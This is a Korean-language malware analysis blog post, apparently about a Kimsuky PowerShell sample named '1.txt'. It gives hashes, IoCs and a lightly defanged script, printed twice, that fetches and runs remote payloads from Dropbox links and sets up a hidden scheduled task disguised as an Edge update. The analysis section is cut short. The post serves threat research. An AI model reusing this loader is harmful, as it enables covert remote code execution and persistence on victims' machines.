북한 김수키(Kimsuky)에서 만든 악성코드-1.txt(2024.12.14)
Contents
오늘은 북한 김수키(Kimsuky)에서 만든 악성코드-1.txt(2024.12.14) 애 대해 글을 적어보겠습니다. 일단 어떤 방식으로 유포가 되는지 모르겠지만 일단 텍스트 파일에 PowerShell 코드가 있으며 해당 파일을 실행을 하면 드롭 박스에 업로드된 txt 파일에서 실행을 하는 것이 특징입니다.
일단 해쉬값은 다음과 같습니다.
파일명:1.txt
사이즈:1,137 Bytes
MD5:aa793be3a980534b116c6744b77029e5
SHA-1:71de1f8e9d109354d571df180563cb6ed1786792
SHA-256:3e1353241852bc3ece184d55f1a2a194bdbe0a4ee6908d7a7827673b7fa38929
악성코드에 포함된 PowerShell 코드
$BPS = Join-Path ($env:App(D)ata) "msupdate(.)ps1"; $str
= '$aaa = Join-Path ($env:AppData) "tem(p).ps1"; wget -Uri
"hxxps://dl.dropboxuse(r)content(.)com/scl/fi/5z7u901sdzoqz00l(i)94n1/system-x(.)txt?rl
key=61jkj43d1i(x)2s785wgdkvl9po&st=sonqsoi6&dl=0" -OutFile $aaa; (&) $aaa; Remo(v)e-
Item -Path $aaa -F(o)rce;'; $str | O(u)t-File -File(P)ath $BPS -Enc(o)ding UTF8; $(a
)ction = New-Schedule(d)TaskAction -Ex(e)cute 'PowerShell(.)exe' -Argument '(-)Windo
wStyle Hidden -nop -NonIn(t)eractive -NoPr(o)file -Executi(o)nPolicy Bypass -C(o)m
mand "& {$abc = Join-Path ($en(v):AppData) \"msupdate(.)ps1\"; & $abc;}"'; $t(r)i
gger = New-Schedule(d)TaskTrigger -Once -At ((G)et-Date).AddMi(n)utes(15) -Repeti
(t)ionInterval (New-TimeSp(a)n -Minute(s) 30); $sett(i)ngs = New-Scheduled(T)askS
ettingsSet -(H)idden; Register-(S)cheduledTask -Tas(k)Name "MicrosoftEdgeUpdate(T
)askMachineUA{08D75543-4129-40F4-81D2-EB97D3D54985}" -Action $action -Trigger $tr
igg(e)r -Settings $settings; $aaa = Join-Path ($env:AppData) "system_first.ps1";
wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/pcda4919r00y2(0)rplmqrn/s
ystem-f(.)txt?rlkey=3aqcyuzbc8h6clctfk3nabqjk&st=n(6)3y43d8&dl=0"
-OutFil(e) $aaa; & ($)aaa; Rem(o)ve-Item -Path $aaa -Force;
코드 분석
1 msupdate(.) ps1 생성 및 작업 스케줄러 등록
$BPS 경로에 msupdate.ps1라는 이름으로 PowerShell 스크립트를 저장
저장된 msupdate.ps1의 내용은 $str 변수에 정의된 스크립트를 포함
2 작업 스케줄러 …
일단 해쉬값은 다음과 같습니다.
파일명:1.txt
사이즈:1,137 Bytes
MD5:aa793be3a980534b116c6744b77029e5
SHA-1:71de1f8e9d109354d571df180563cb6ed1786792
SHA-256:3e1353241852bc3ece184d55f1a2a194bdbe0a4ee6908d7a7827673b7fa38929
악성코드에 포함된 PowerShell 코드
$BPS = Join-Path ($env:App(D)ata) "msupdate(.)ps1"; $str
= '$aaa = Join-Path ($env:AppData) "tem(p).ps1"; wget -Uri
"hxxps://dl.dropboxuse(r)content(.)com/scl/fi/5z7u901sdzoqz00l(i)94n1/system-x(.)txt?rl
key=61jkj43d1i(x)2s785wgdkvl9po&st=sonqsoi6&dl=0" -OutFile $aaa; (&) $aaa; Remo(v)e-
Item -Path $aaa -F(o)rce;'; $str | O(u)t-File -File(P)ath $BPS -Enc(o)ding UTF8; $(a
)ction = New-Schedule(d)TaskAction -Ex(e)cute 'PowerShell(.)exe' -Argument '(-)Windo
wStyle Hidden -nop -NonIn(t)eractive -NoPr(o)file -Executi(o)nPolicy Bypass -C(o)m
mand "& {$abc = Join-Path ($en(v):AppData) \"msupdate(.)ps1\"; & $abc;}"'; $t(r)i
gger = New-Schedule(d)TaskTrigger -Once -At ((G)et-Date).AddMi(n)utes(15) -Repeti
(t)ionInterval (New-TimeSp(a)n -Minute(s) 30); $sett(i)ngs = New-Scheduled(T)askS
ettingsSet -(H)idden; Register-(S)cheduledTask -Tas(k)Name "MicrosoftEdgeUpdate(T
)askMachineUA{08D75543-4129-40F4-81D2-EB97D3D54985}" -Action $action -Trigger $tr
igg(e)r -Settings $settings; $aaa = Join-Path ($env:AppData) "system_first.ps1";
wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/pcda4919r00y2(0)rplmqrn/s
ystem-f(.)txt?rlkey=3aqcyuzbc8h6clctfk3nabqjk&st=n(6)3y43d8&dl=0"
-OutFil(e) $aaa; & ($)aaa; Rem(o)ve-Item -Path $aaa -Force;
코드 분석
1 msupdate(.) ps1 생성 및 작업 스케줄러 등록
$BPS 경로에 msupdate.ps1라는 이름으로 PowerShell 스크립트를 저장
저장된 msupdate.ps1의 내용은 $str 변수에 정의된 스크립트를 포함
2 작업 스케줄러 …
IoC
71de1f8e9d109354d571df180563cb6ed1786792
aa793be3a980534b116c6744b77029e5
3e1353241852bc3ece184d55f1a2a194bdbe0a4ee6908d7a7827673b7fa38929
aa793be3a980534b116c6744b77029e5
3e1353241852bc3ece184d55f1a2a194bdbe0a4ee6908d7a7827673b7fa38929